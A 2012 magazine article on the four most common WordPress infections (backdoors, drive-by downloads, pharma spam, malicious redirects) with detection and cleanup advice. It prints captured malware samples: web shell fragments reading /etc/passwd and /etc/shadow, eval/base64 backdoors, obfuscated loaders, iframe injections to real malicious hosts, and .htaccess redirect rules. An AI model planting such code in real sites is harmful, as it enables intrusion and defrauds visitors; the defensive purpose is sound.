Security: Common WordPress Malware Infections

WordPress security is serious business. Exploits of vulnerabilities in WordPress architecture have led to mass compromises of servers through cross-site contamination. WordPress extensibility increases its vulnerability; plugins and themes house flawed logic, loopholes, Easter eggs, backdoors and a slew of other issues. Firing up your computer to find that youre supporting a random cause or selling Viagra can be devastating.

In WordPress core, all security issues are quickly addressed; the WordPress team is focused on strictly maintaining the integrity of the application. The same, however, cannot be said for all plugins and themes.

The focus of this post is not to add to the overwhelming number of WordPress security or WordPress hardening posts that you see floating around the Web. Rather, well provide more context about the things you need to protect yourself from. What hacks are WordPress users particularly vulnerable to? How do they get in? What do they do to a WordPress website? In this lengthy article, we’ll cover backdoors, drive-by downloads, pharma hack and malicious redirects.

Over the past two years, Web malware has grown around 140%. At the same time, WordPress has exploded in popularity as a blogging platform and CMS, powering close to 17% of websites today. But that popularity comes at a price; it makes WordPress a target for Web-based malware. Why? Simple: its reach provides the opportunity for maximum impact. Sure, popularity is a good thing, but it also makes us WordPress users vulnerable.

A Bit About Our Security Expert: Meet Tony

Lacking the technical knowledge needed to go into great depth, I brought on board a co-author to help me out. Bringing the technical information is Tony Perez, Chief Operations and Financial Officer of Sucuri Security. Sucuri Security provides detection, alerting and remediation services to combat Web-based malware. In other words, it works on websites that have been compromised. This means that Tony has the background, statistics and, most importantly, knowledge to go really in depth on malware issues that affect WordPress users.

I asked Tony how he got into Web security:

“I think it goes back to 2009. I was managing and architecting large-scale enterprise solutions for Department of Defense (DoD) clients and traveling the world. In the process, there was a little thing called compliance with the Security Technical Implementation Guide (STIG), set forth by the Defense Information Systems Agency (DISA). I know, a mouthful, but its how we did things in the DoD; if it didnt have an acronym, it didnt belong.

That being said, it wasnt until I joined Dre and Daniel at Sucuri Security, in early 2011, that I really began to get what I consider to be any resemblance of InfoSec chops.”

Armed with Tonys technical knowledge, well look at the main issues that affect WordPress users today. But before we get into details, lets look at some of the reasons why WordPress users might be vulnerable.

What Makes WordPress Vulnerable?

Heres the simple answer. Old versions of WordPress, along with theme and plugin vulnerabilities, multiplied by the CMS popularity, with the end user thrown into the mix, make for a vulnerable website.

Lets break that down.

The first issue is outdated versions of WordPress. Whenever a new WordPress version is released, users get a nagging message, but plenty of users have gotten pretty good at ignoring the nag. Core vulnerabilities in themselves are rarely an issue. They do exist; proof can be found in the most recent 3.3.3 and 3.4.1 releases. WordPress core team has gotten pretty good at rolling out security patches quickly and efficiently, so the risk of exploitation is minimal, provided that WordPress users update their installation. This, unfortunately, is the crux of the problem: WordPress users ignore the message. And its not just inexperienced and casual WordPress users who arent updating. A recent high-profile hack was of the Reuters website, which was running version 3.1.1 instead of the current 3.4.1.

Vulnerabilities in plugins and themes is another issue. The WordPress repository has 20,000 plugins and is growing. The plugins are of varying quality; some of them inevitably have security loopholes, while others are outdated. On top of that, consider all of the themes and plugins outside of the repository, including commercial products that are distributed for free on Warez websites and come packed with malware. Google is our favorite search engine, but its not so hot for finding quality WordPress themes.

Then, theres popularity. WordPress is popular, without a doubt. Around 700 million websites were recorded as using WordPress in May of this year. This popularity means that if a hacker can find a way into one WordPress website, they have potentially millions of websites for a playground. They dont need to hack websites that use the current version of WordPress; they can scan for websites that use old insecure versions and hack those.

Finally and most significantly, the biggest obstacle facing WordPress users is themselves. Tony in his own words:

“For whatever reason, there is this perception among WordPress users that the hardest part of the job was paying someone to build the website and that once its built, thats it, its done, no further action required. Maybe that was the case seven years ago, but not today.

WordPress ease of use is awesome, but I think it provides a false sense of assurances to end users and developers alike. I think, though, this perception is starting to change.”

From Tonys experience at Sucuri Security, the most common vulnerabilities to website exploits are:

• Out of date software,
• Poor credential management,
• Poor system administration,
• Soup-kitchen servers,
• Lack of Web knowledge,
• Corner-cutting.

A bit of time and education are all it takes to remedy these issues and to keep your WordPress website secure. This means not just ensuring that you as a WordPress expert are educated, but ensuring that the clients you hand over websites to are as well.

The Evolution Of Attacks

As the Internet has evolved, the nature of hacking has evolved with it. Hacking started out as a very different animal. Back in the day, it was about showing your technical prowess by manipulating a website to do things beyond the webmasters intentions; this was often politically motivated. One day youd wake up and find yourself supporting the opposition in Nigeria or Liberia. These days, hacking is all about money. The recent DNSChanger malware (i.e. the Internet Doomsday attack), for example, let hackers rake in close to $14 million before being stopped by the FBI and Estonian police last November.

Another hacking technology that has emerged is malnets. These distributed malware networks are used for everything including identify theft, DDoS attacks, spam distribution, drive-by downloads, fake AV and so on. The hackers automate their attacks for maximum exposure.

Automation through the use of bots is not their only mechanism. Today you also have malware automation: the use of tools to quickly generate a payload (i.e. the infection), allowing the attacker to focus strictly on gaining access to the environment. Once the hacker has access to the environment, they copy and paste in the auto-generated payload. One of the more prevalent automation tools is the Blackhole Exploit Kit. This and many other kits can be purchased online for a nominal fee. That fee buys sustainment services and keeps the kit updated with new tools for the latest vulnerabilities. Its a true enterprise.

Common WordPress Malware Issues

Thousands of malware types and infections are active on the Internet; fortunately, not all apply to WordPress. For the rest of this post, well look at four of the most common attacks on WordPress users:

• Backdoors,
• Drive-by downloads,
• Pharma hacks,
• Malicious redirects.

Backdoor

A backdoor lets an attacker gain access to your environment via what you would consider to be abnormal methods — FTP, SFTP, WP-ADMIN, etc. Hackers can access your website using the command line or even using a Web-based GUI like this:

A backdoor GUI. Click the image for the whole picture!

Backdoors are exceptionally dangerous. Left unchecked, the most dangerous can cause havoc on your server. They are often attributed to cross-site contamination incidents — i.e. when websites infect other websites on the same server.

How am I attacked?

The attack often happens because of out-of-date software or security holes in code. A vulnerability well known to the WordPress community was found in the TimThumb script that was used for image resizing. This vulnerability made it possible for hackers to upload a payload that functioned as a backdoor.

Here is an example of a scanner looking specifically for vulnerable versions of TimThumb:

207.58.169.51 " - [15/May/2012:18:33:22 +0000] GET //wp-content/themes/TheStyle/timthumb.php?src=https://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1 404 307 - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6164.177.155.35 " - [15/May/2012:18:28:02 +0000] GET /scanner//wp-content/themes/scarlett/?src=https://wordpress.com.airatrip.com/temp/dapetsatu.php HTTP/1.1 404 304 - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6

What does it look like?

Like most infections, this one can be encoded, encrypted, concatenated or some combination thereof. However, its not always as simple as looking for encrypted code; there are several instances in which it looks like legitimate code. Here is an example:

$iOll100oil0ioIlo = 1;  $user = 'chippy';  $pass = '1337';  $iIi1i11l11OoIlIl = '#990000';   if($_GET['id']== 'logout') {Logout();} if(!($_GET['id'] == 'sshSession'))  {echo CSS($iIi1i11l11OoIlIl);}  else if($_GET['id'] == 100){echo "";} else if($_GET['id'] == 'Delete'){Suicide();}  function iI11i0Il0iO0iooi($file,$per) { if(function_exists('chmod')){$try = chmod($file,$per); } if(!$try){$try = Exe("\143h\x6do\144 $per $file"); } if($try){return true;} else{return false;} } function showUsers() { if($rows = Exe('cat /etc/passwd')){echo $rows;} elseif($rows= Exe('cat /etc/domainalias')){echo $rows;} elseif($rows= Exe('cat /etc/shadow')){echo $rows;} elseif($rows= Exe('cat /var/mail')) {echo $rows;} elseif($rows= Exe('cat /etc/valiases')) {echo $rows;} elseif(file_exists('/etc/passwd')) { for($uid=0;$uid

Another example:

<?php$cpanel_port="2082";$connect_timeout=5;set_time_limit(0);$submit=$_REQUEST['submit'];$users=$_REQUEST['users'];$pass=$_REQUEST['passwords'];$target=$_REQUEST['target'];$cracktype=$_REQUEST['cracktype'];if($target == ""){$target = "localhost";}$charset=$_REQUEST['charset'];if($charset=="") $charset="lowercase";$max_length=$_REQUEST['max_length'];if($max_length=="") $max_length=10;$min_length=$_REQUEST['min_length'];if($min_length=="") $min_length=1; $charsetall = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l",  "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B",  "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R",  "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7",  "8", "9");$charsetlower = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j",  "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x","y", "z"); $charsetupper = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L",  "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z"); $charsetnumeric = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9"); $charsetlowernumeric = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j",  "k", "l", "m", "n", "o", "p", "q","r", "s", "t", "u", "v", "w", "x", "y", "z",  "0", "1", "2", "3", "4", "5", "6", "7";

Below is a case where the content is hidden in the database and targets WordPress installations:

return @eval(get_option(\blogopt1\));

And here is a very simple backdoor that allows any PHP request to execute:

eval (base64_decode($_POST["php"]));

Here is an example of a messy backdoor specifically targeting the TimThumb vulnerability:

function aknhtkmml3($ur5){$dtuq=$u;$pnt=e6;$p5zy=r';$xcl4=e(~;$feuh=od;$qjka=dec;$rhi=$u;$m=as;$xcew=);;$iw=_';$jutx=5=b;$fwiw=4;$zqi=r';$pwrb=5;eval($rhi.$p5zy.$jutx.$m.$pnt.$fwiw.$iw.$qjka.$feuh.$xcl4.$dtuq.$zqi.$pwrbreturn $ur5;}$sk25=M3JffC1WcjMrV1fVHVOKDpoTSIoMGJUNzdXLVZyMytWX1R1Tig6a

Here is another backdoor that commonly affects WordPress installations, the Filesman:

$auth_pass = 63a9f0ea7bb98050796b649e85481845;$color = #df5;$default_action = SQL;$default_charset = Windows-1251;$protectionoffer = ficken;preg_replace(/.*/e,\x65\x76\x61\x6C\.. hundreds more lines..

How can I tell whether Im infected?

Backdoors come in all different sizes. In some cases, a backdoor is as simple as a file name being changed, like this:

• wtf.php
• wphap.php
• php5.php
• data.php
• 1.php
• p.php

In other cases, the code is embedded in a seemingly benign file. For instance, this was found in a themes index.php file, embedded in legitimate code:

<?php$a = '?Qw\"4MZ\'.K&RWFQJP@eJru\"`1\"#2]u,}H$ \\R[d`(j4_2e+c\'p.zg0\\y3_,pU8n}=o[oL@QT,f4>M?\"U11PyB-sUm!GC:6BW\'}HS>y(Ka=j/]ldo~6iBD]x2^@UyWxQ^vy26t;aWXLg6:L&:cp\\(NU:.up(NiZ-`U@wK[Y#5\'jKB8R\\{C:%ro?\"f1*6zeC\\;dTf@/iU7U\"YmU7jyQolB0n*Ay@<_dxzINaj^LAu\"COoygZs9K`[[Pf|J\':+l3&6bh!A6C78fg)aOdUi07Flg-i35$>\"8E9{/;=E^U^F>g(nM]X^t K]-5pC:0FRU_Ndzl+ZCi!aR)Q g*_]++;9A-\\[=#/sc^Y^Ld9oO:R\"D$#,/bi:m&S031lQ4{Ew[ W)eqx5-L8QP;^_}IzlON|c_i5tf[mC\\FLB8FXFrpxC-W$,\"~xRNv6/aL%I)rle::)S`bySTrwaK|mM|g!K_8[Ad`jnTXTor^CSA=(u1!X\\~F+{/,HnD$1*e{x;TN+H.N|Ol&F}\'~Z&Ff#VsKE8PVC7S=R)k]Qy-NJyTqw\\qSc9:fo.36GcmkzB)NKu-}o:M;5#.._ bD:},+-?AT$0A~RJN~@[|1uJM,M[:.\\|Rvz^\"(~D]#T #(JQ(k-%}$PK0~\'K.dIa[DA]M@#,DX,G`WyhD\'nB,@m

Backdoors are tricky. They constantly evolve, so there is no definitive way to say what you should look for.

How do I prevent it?

While backdoors are difficult to detect, preventing them is possible. For the hack to be effective, your website needs an entry point that is accessible to the hacker. You can close backdoors by doing the following:

1. Prevent access.
   Make your environment difficult to access. Tony recommends a three-pronged approach to locking down wp-admin:
   • Block IPs,
   • Two-factor authentication,
   • Limited access by default.

   This will make it extremely difficult for anyone except you to access your website.

2. Kill PHP execution.
   Often the weakest link in any WordPress chain is the /uploads/ directory. It is the only directory that needs to be writable in your installation. You can make it more secure by preventing anyone from executing PHP. Its simple to do. Add the following to the .htaccess file at the root of the directory. If the file doesnt exist, create it.

<FilesMatch *.php>Order Deny, AllowDeny from All</Files>

How is it cleaned?

Once you have found a backdoor, cleaning it is pretty easy — just delete the file or code. However, finding the file can be difficult. On his blog, Canton Becker provides some advice on ways to scour your server for backdoors. There is no silver bullet for backdoors, though, or for any infection — backdoors can be simple or complex. You can try doing some basic searches for eval and base64_decode, but if your code looks like whats below, then knowing what to look for becomes more difficult:

$XKsyG=as;$RqoaUO=e;$ygDOEJ=$XZKsyG.s.$RqoaUO.r.t;$joEDdb=b.$XZKsyG.$RqoaUO.(64)._.d.$RqoaUO.c.o.d.$RqoaUO;@$ygDOEJ(@$joEDdb(~ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY

If you are familiar with the terminal, you could log into your website using SSH and try certain methods. The most obvious and easiest method is to look for this:

# grep -ri "eval" [path]

Or for this:

# grep -ri "base64_decode" [path]

The r ensures that all files are scanned, while the i ensures that the scan is case-insensitive. This is important because you could find variations of eval: Eval, eVal, evAl, evaL or any other permutation. The last thing you want is for your scan to fall short because you were too specific.

Look for recently modified files:

find -type f -ctime -0 | more

The -type looks for files, and -ctime restricts your scan to the last 24 hours. You can look at the last 24 or 48 hours by specifying -1 or -2, respectively.

Another option is to use the diff command. This enables you to detect the differences between files and directories. In this case, you would use it for directories. For it to be successful, though, you need to have clean copies of your installation and themes. So, this works only if you have a complete backup of your website.

# diff -r /[path]/[directory] /[path]/[directory] | sort

The -r option is recursive through all directories, and the sort command sorts the output and makes it easier to read. The key here is to quickly identify the things that dont belong so that you can run integrity checks. Anything you find that is in the live websites directory but not in the backup directory warrants a second look.

Drive-By Downloads

A drive-by download is the Web equivalent of a drive-by shooting. Technically, it is usually embedded on your website via some type of script injection, which could be associated with a link injection.

The point of a drive-by download is often to download a payload onto your users local machine. One of the most common payloads informs the user that their website has been infected and that they need to install an anti-virus product, as shown here:

How does the attack get in?

There are a number of ways an attack can get in. The most common causes are:

• Out of date software,
• Compromised credentials (wp-admin, FTP),
• SQL injection.

What does it look like?

Below are a number of examples of link injections that lead to some type of drive-by download attack:

<scripttype="text/javascript">varaddthis_product='wpp-264';varaddthis_config={"data_track_clickback":true,"data_track_addressbar":true,"ui_language":"fr"};if(typeof(addthis_

And this:

document.write('<iframesrc="https://orangeroller.ru/in.cgi?16"name="Twitter"scrolling="auto"frameborder="no"...

And this:

<scripttype="text/javascript">document.write("<iframesrc="https://objectcash.in/in.cgi?19"name="Twitter" scrolling="auto" frameborder="no" align="center" ...

More recently, drive-by downloads and other malware have been functioning as conditional malware — designed with rules that have to be met before the infection presents itself. You can find more information about how conditional malware works in Sucuris blog post Understanding Conditional Malware.

How can I tell whether Im infected?

Using a scanner such as SiteCheck to see whether you are infected is possible. Scanners are pretty good at picking up link injections. Another recommendation is to sign up for Google Webmaster Tools and verify your website. In the event that Google is about to blacklist your website, it would email you beforehand notifying you of the problem and giving you a chance to fix it. The free service could pay dividends if youre looking to stay proactive.

Outside of using a scanner, the difficulty in identifying an infection will depend on its complexity. When you look on the server, it will look something like this:

echo(gzinflate(base64_decode(VVHLboMwELxHyj/4ZlBTnhL0QSKlVQ899QOaChl7AUvEduyFJP36Aomi9LizszOzu4XjVhrcLBcDs6Q8kDURmvd7UBhwCwzho4Op8qisLdsD9VfLRalGHnWAW0Qrqx6Bvo7o4btUP

The good news is that such an infection has to be somewhere where an external output is generated. The following files are common places where youll find link injections:

• wp_blog_header.php (core file)
• index.php (core file)
• index.php (theme file)
• function.php (theme file)
• header.php (theme file)
• footer.php (theme file)

About 6 times out of 10, the infection will be in one of those files. Also, your anti-virus software might detect a payload being dropped onto your computer when you visit your website — another good reason to run anti-virus software locally.

Sucuri has also found link injections embedded in posts and pages (as opposed to an originating PHP file), as well as in text widgets. In such cases, scrub your database and users to ensure that none of your accounts have been compromised.

How is it cleaned?

Cleaning can be a challenge and will depend on your technical skill. You could use the terminal to find the issue.

If you have access to your server via SSH, youre in luck. If you dont, you can always download locally. Here are the commands that will be of most use to you when traversing the terminal:

• CURL
  Used to transfer data with a URL syntax.
• FIND
  Search by file or directory name.
• GREP
  Search for content in files.

For example, to search all of your files for a particular section of the injection, try something like this:

$ grep -r "https://objectcash.in" .

Including the following characters is important:

• "
  Maintains the integrity of the search. Using it is important when youre searching for special characters because some characters have a different meaning in the terminal.
• -r
  Means recursive and will traverse all directories and files.

You can also refine your search by file type:

$ grep --include ".php" -r "https://objectcash.in" .

Enabling the --include option allows you to specify file type; in this instance, only PHP files.

These are just a few tricks. Once youve located the infection, you have to ensure that you remove every instance of it. Leaving just one could lead to serious frustration in the future.

Pharma Hack

Pharma hack is one of the most prevalent infections around. It should not be confused with malware; its actually categorized as SPAM — stupid pointless annoying messages. If youre found to be distributing SPAM, you run the risk of being flagged by Google with the following alert:

This site may be compromised!!

This is what it will look like on Googles search engine results page (SERP):

How am I attacked?

The pharma SPAM injection makes use of conditional malware that applies rules to what the user sees. So, you may or may not see the page above, depending on various rules. This is controlled via code on the server, such as the following:

<?php$keyspat = array('adobe creative suite 5.5 master collection','microsoft windows 7 ultimate','microsoft office 2010 professional plus','adobe acrobat x pro',...'microsoft','soft' => 'adobe','cheap' => 'adobe','price' => 'adobe','order' => 'adobe','sale' => 'adobe','buy' => 'adobe','professional' => 'adobe','system' => 'adobe',);$rfrr = urldecode($_SERVER["HTTP_REFERER"]);foreach ($keyspat as $k => $v){     if (is_int($k))     {          if (stripos($rfrr,$v))          {               header("Location:https://outlet-programs.net/browse/search/?q=".$v);               exit;          }     }     else     {          if (stripos($rfrr,$k))          {               header("Location:https://outlet-programs.net/browse/search/?q=".$v);               exit;          }     }}?>

Some injections are intelligent enough to create their own nests within your server. The infection makes use of $_SERVER["HTTP_REFERER"], which redirects the user to an online store that is controlled by the attacker to generate revenue. Here is an example of such a monetized attack:

<?php$adm_url        = 'https://tdsinto.net/big/gtxt.php?pg=';$page_upd_time  = 60*60*24;//1 day$empty_upd_time = 60*60*24*10;//10 dayserror_reporting(0);if (isset($_POST['test_mode']) && $_POST['test_mode']==1){if (!is_dir('tmp')){$res = mkdir('tmp');if ($res===false) {exit('Folder create error');}@chmod('tmp',0777);}@file_put_contents('tmp/1','123');if (!is_file('tmp/1')) {exit('File create error');}@unlink('tmp/1');exit('All ok');}

Like most SPAM-type infections, pharma hack is largely about controlling traffic and making money. Money can be made through click-throughs and/or traffic. Very rarely does a pharma hack injection redirect a user to a malicious website that contains some additional infection, as with a drive-by download attempt.

This is why its so difficult to detect. Its not as simple as querying for Cialis or Viagra, although thatd be awesome. Most people would be surprised by the number of legitimate pharmaceutical companies that exist and publish ads on the Web. This adds to the challenge of detecting these infections.

What does it look like?

Pharma hack has evolved, which has made it more difficult to detect. In the past, SPAM injections would appear in your pages, where they were easy to find and, more importantly, remove.

Today, however, pharma hack is quite different. It uses a series of backdoors, sprinkled with intelligence, to detect where traffic is coming from, and then it tells the infection how to respond. Again, it can behave as conditional malware. More and more, pharma hack reserves its payload for Googles bots; the goal is to make it onto Googles SERPs. This provides maximum exposure and the biggest monetary return for the hackers.

Heres an image of an old pharma hack injecting SPAM into a blogs tags:

Another version of pharma hack was injected in such a way that when the user clicks on an apparently benign link (such as Home, About or Contact), it redirects the user to a completely different page. Somewhere like this:

How do I tell whether Im infected?

Identifying an infection can be very tricky. In earlier permutations, identifying an infection was as easy as navigating your website, looking at your ads, links, posts and pages, and quickly determining whether youve been infected. Today, there are more advanced versions that are harder to find.

The good news for diligent webmasters is that by enabling some type of auditing or file monitoring on your WordPress website, youll be able to see when new files have been added or when changes have been made. This is by far one of the most effective methods of detection.

You could try using free scanners, such as SiteCheck. Unfortunately, many HTTP scanners, including Sucuris, struggle with the task because pharma hack is not technically malicious, so determining the validity of content can be difficult for a scanner.

How is it cleaned?

First, identify the infected files, and then remove them. You can use the commands weve outlined above, and you can make queries to your website via the terminal to quickly see whether youre serving any pharma SPAM to your visitors.

When combatting pharma hacks, one of the most useful commands is grep. For example, to search for any of the ads or pharma references being flagged, run this:

# egrep -wr 'viagra|pharmacy' .

By using egrep, were able to search multiple words at the same time if necessary, thus saving you time in this instance.

Or try something like this:

# grep -r "https://canadapharmacy.com" .

This only works if the infection is not encoded, encrypted or concatenated.

Another useful method is to access your website via different user agents and referrers. Here is an example of what one website looked like when using a Microsoft IE 6 referrer:

Try Bots vs Browsers to check your website through a number of different browsers.

Terminal users can also use CURL:

# curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" https://somesite.com

How do I prevent it?

Preventing a pharma hack can be tricky. Sucuri has found that the hack regularly exploits vulnerable out-of-date software. However, your out-of-date WordPress installation is not necessarily the problem. Even if you are up to date, another outdated installation on the same server could be vulnerable to the infection. If the real payload resides elsewhere on your server, not within your websites directory, then catching it can be exceptionally difficult.

Here is an example of what you might be looking for if you cant find the infection in your own installation:

# <div id=column-wrap><?php $wp__theme_icon=@create_function(,@file_get_contents(~/public_html/wp-content/themes/my-really-good-theme/https://media.smashingmagazine.com/wp-content/uploads/2012/08/s.jpg));$wp__theme_icon(); ?>

To prevent a pharma hack, you should do two things:

1. Keep your software up to date,
2. Steer clear of soup-kitchen servers.

Malicious Redirects

A malicious redirect sends a user to a malicious website. In 2010, 42,926 new malicious domains were detected. In 2011, this number grew to 55,294. And that just includes primary domains, not all of their subdomains.

When a visitor is redirected to a website other than the main one, the website may or may not contain a malicious payload. Suppose you have a website at myhappysite.com; when someone visits it, the website could take the visitor to meansite.com/stats.php, where the malicious payload is in that websites stats.php file. Or it could be a harmless website with just ads and no malicious payload.

How am I attacked?

As with many malware attacks, it comes down to access. The malicious redirect could be generated by a backdoor. The hacker would scan for a vulnerability, such as TimThumb or old versions of WordPress and, when they find it, upload a payload that functions as a backdoor.

What does it look like?

Detecting a redirect is not as complex as detecting some of the other infections. It is often found in your .htaccess file and looks something like this:

#c3284d#<IfModule mod_rewrite.c>RewriteEngine OnRewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil\.(.*)RewriteRule ^(.*)$ https://mytresca.com/counter.php [R=301,L]</IfModule>#/c3284d#

Or like this:

<IfModule mod_rewrite.c>RewriteEngine onRewriteOptions inheritRewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]RewriteCond %{HTTP_COOKIE} !^.*cookie-visited-name.*$ [NC]RewriteRule .* https://sweepstakesandcontestsnow.com/nl-in.php?d=1 [CO=cookie-visited-name:1:%{HTTP_HOST}:10000,R,L]</IfModule>

There may be instances where a redirect is encoded and resides in one of your PHP files. If so, it will usually be found in your header.php, footer.php or index.php file; it has also been known to reside in the root index.php file and in other core template files. It is not always encoded, but if it is, it will look something like this:

{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z{fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690

How do I tell if I am infected?

There are a few ways to check for infections. Here are some suggestions:

• Use a free scanner, such as SiteCheck. They very rarely miss malicious redirects.
• Test using Bots vs Browser.
• Listen to your users. You might not detect the redirect, but sometimes a user will alert you to it.

If a user does detect a problem, ask them pertinent questions to help diagnose the problem:

• What operating system are they using?
• What browser(s) are they using, and which version(s)?

The more information you get from them, the better you can replicate the issue and find a fix.

How is it cleaned?

Malicious redirects are one of the easiest infections to clean. Heres a good starting point:

1. Open your .htaccess file.
2. Copy any rewrite rules that you have added yourself
3. Identify any malicious code, like the sample above, and remove it from the file. Scroll all the way to the bottom of .htaccess to make sure there arent any error directives pointing to the same infection.

Be sure to also look for all .htaccess files on the server. Here is one quick way to see how many exist on your server:

# find [path] -name .htaccess -type f | wc -l

And this will tell you where exactly those files are:

# find [path] -name .htaccess -type f | sort

The infection is not always restricted there, though. Depending on the infection, you might also find the redirect encoded and embedded in a file such as index.php or header.php.

Alarmingly, these infections can replicate across all of your .htaccess files. The backdoor responsible for it can also be used to create multiple .htaccess files across all of your directories, all with the same infection. Removing the infection can feel like an uphill struggle, and sometimes cleaning every file you can find is not enough. There are even cases where a file is created outside of the Web directory. The lesson is always look outside of your Web directory as well as within it.

How do I prevent it?

A quick and easy method is to change ownership of the file, or to reduce the files permissions so that only the owner has permission to modify it. However, if your root account is compromised, that wont do you much good.

The most important file to take care of is .htaccess. Check out the tutorial Protect Your WordPress Site with .htaccess for tips on doing that.

Conclusion

There you have it: four prevalent attacks that cause havoc across many WordPress installations today. You might not feel better if you get hacked, but hopefully, with this bit of knowledge, youll feel more confident that the hack can be cleaned and that your website can be returned to you. Most importantly, if you take one thing away from this: always keep WordPress updated.

Tonys Top Ten Security Tips

1. Get rid of generic accounts, and know who is accessing your environment.
2. Harden your directories so that attackers cant use them against you. Kill PHP execution.
3. Keep a backup; you never know when youll need it.
4. Connect securely to your server. SFTP and SSH is preferred.
5. Avoid soup-kitchen servers. Segment between development, staging and production.
6. Stay current with your software — all of it.
7. Kill unnecessary credentials, including for FTP, wp-admin and SSH.
8. You dont need to write posts as an administrator, nor does everyone need to be an administrator.
9. If you dont know what youre doing, leverage a managed WordPress hosting provider.
10. IP filtering + Two-factor authentication + Strong credentials = Secure access

Tonys Most Useful Security Plugins

• Sucuri Sitecheck Malware Scanner
  This plugin from Tony and the Sucuri crew enables full malware and blacklist scanning in your WordPress dashboard, and it includes a powerful Web application firewall (WAF).
• Login Lock
  This enforces strong password policies, locks down log-ins, monitors log-ins, blocks hacker IPs and logs out idle users.
• Two-Factor Authentication
  This plugin enables Duos two-factor authentication, using a service such as a phone callback or SMS message.
• Theme-Check
  Test your theme to make sure its up to spec with theme review standards.
• Plugin-Check
  Does what Theme-Check does but for plugins.

Security Tools

• SucuriSiteCheck
• Unmask Parasites scanner

Security Resources

• Sucuri Blog
• Security, Perishable Press
• Unmask Parasites Blog
• Badware Busters
• WPsecure
• Locking Down WordPress, Michael Pick

Useful Security Articles

• 10 Useful WordPress Security Tweaks, Jean-Baptiste Jung
• 10 Steps to Secure Your WordPress Installation, Fouad Matin
• Google Blacklist Warnings: Somethings Not Right Here, Tony Perez
• Hardening WordPress, WordPress Codex
• How to Stop the Hacker and Ensure Your Site Is Locked, Tony Perez
• Website Malware Removal: WordPress Tips and Tricks, Tony Perez

(al)

Siobhan McKeown for Smashing Magazine, 2012.